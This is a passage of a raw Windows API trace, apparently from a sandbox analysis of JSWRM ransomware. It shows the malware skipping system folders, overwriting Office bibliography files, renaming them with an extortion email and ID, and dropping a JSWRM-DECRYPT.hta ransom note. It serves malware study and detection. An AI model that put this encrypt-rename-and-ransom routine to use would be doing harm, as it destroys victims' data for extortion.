HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.912] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\mlaseventheditionofficeonline.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0128.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0128.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0128.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0128.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.913] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc38b3c05, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3aa3bf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0xf11a8, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2=".") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="..") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="...") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="windows") returned -1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="recovery") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="perflogs") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="documents and settings") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="$RECYCLE.BIN") returned 1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="system volume information") returned -1 [0128.913] lstrcmpiW (lpString1="SIST02.XSL", lpString2="msocache") returned 1 [0128.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0128.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIST02.XSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIST02.XSL", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIST02.XSL", lpUsedDefaultChar=0x0) returned 10 [0128.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0128.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0128.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIST02.XSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIST02.XSL", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIST02.XSL", lpUsedDefaultChar=0x0) returned 10 [0128.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0128.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0128.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0128.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0128.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.914] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=251336) returned 1 [0128.914] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.915] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.925] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.925] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.925] CloseHandle (hObject=0x314) returned 1 [0128.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0128.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0128.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0128.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0128.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0128.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0128.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.926] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\sist02.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\SIST02.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\sist02.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0128.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0128.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0128.927] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc3bd4d47, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc3bd4d47, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0xf11a8, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2=".") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="..") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="...") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="windows") returned -1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="recovery") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="perflogs") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="documents and settings") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="$RECYCLE.BIN") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="system volume information") returned 1 [0128.927] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="msocache") returned 1 [0128.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0128.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TURABIAN.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TURABIAN.XSL", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TURABIAN.XSL", lpUsedDefaultChar=0x0) returned 12 [0128.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0128.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0128.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TURABIAN.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TURABIAN.XSL", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TURABIAN.XSL", lpUsedDefaultChar=0x0) returned 12 [0128.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0128.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0128.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0128.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0128.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.929] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=344662) returned 1 [0128.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.929] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0129.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.038] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0129.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0129.046] CloseHandle (hObject=0x314) returned 1 [0129.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0129.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0129.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0129.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0129.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0129.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0129.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0129.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0129.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0129.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0129.047] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\turabian.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\TURABIAN.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\turabian.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0129.064] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc3bd4d47, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc3bd4d47, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0xf11a8, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0129.064] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0129.064] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Style", cAlternateFileName="")) returned 0 [0129.064] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0129.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0129.064] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17774bfd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="BORDERS", cAlternateFileName="")) returned 1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2=".") returned 1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2="..") returned 1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2="...") returned 1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2="windows") returned -1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2="recovery") returned -1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2="perflogs") returned -1 [0129.064] lstrcmpiW (lpString1="BORDERS", lpString2="documents and settings") returned -1 [0129.065] lstrcmpiW (lpString1="BORDERS", lpString2="$RECYCLE.BIN") returned 1 [0129.065] lstrcmpiW (lpString1="BORDERS", lpString2="system volume information") returned -1 [0129.065] lstrcmpiW (lpString1="BORDERS", lpString2="msocache") returned -1 [0129.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0129.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0129.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0129.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0129.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0129.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0129.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bda8 [0129.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0129.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\jswrm-decrypt.hta")) returned 0xffffffff [0129.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0129.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0129.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0129.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0129.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27b348 [0129.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0129.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0129.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b2b8 [0129.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0129.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.069] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.069] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0129.070] CloseHandle (hObject=0x45c) returned 1 [0129.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0129.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0129.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0129.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0129.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0129.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0129.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b9c0 [0129.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0129.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\jswrm-decrypt.hta")) returned 0x20 [0129.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0129.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0129.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0129.072] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x439704dd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName=".", cAlternateFileName="")) returned 0x232040 [0129.072] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.072] FindNextFileW (in: 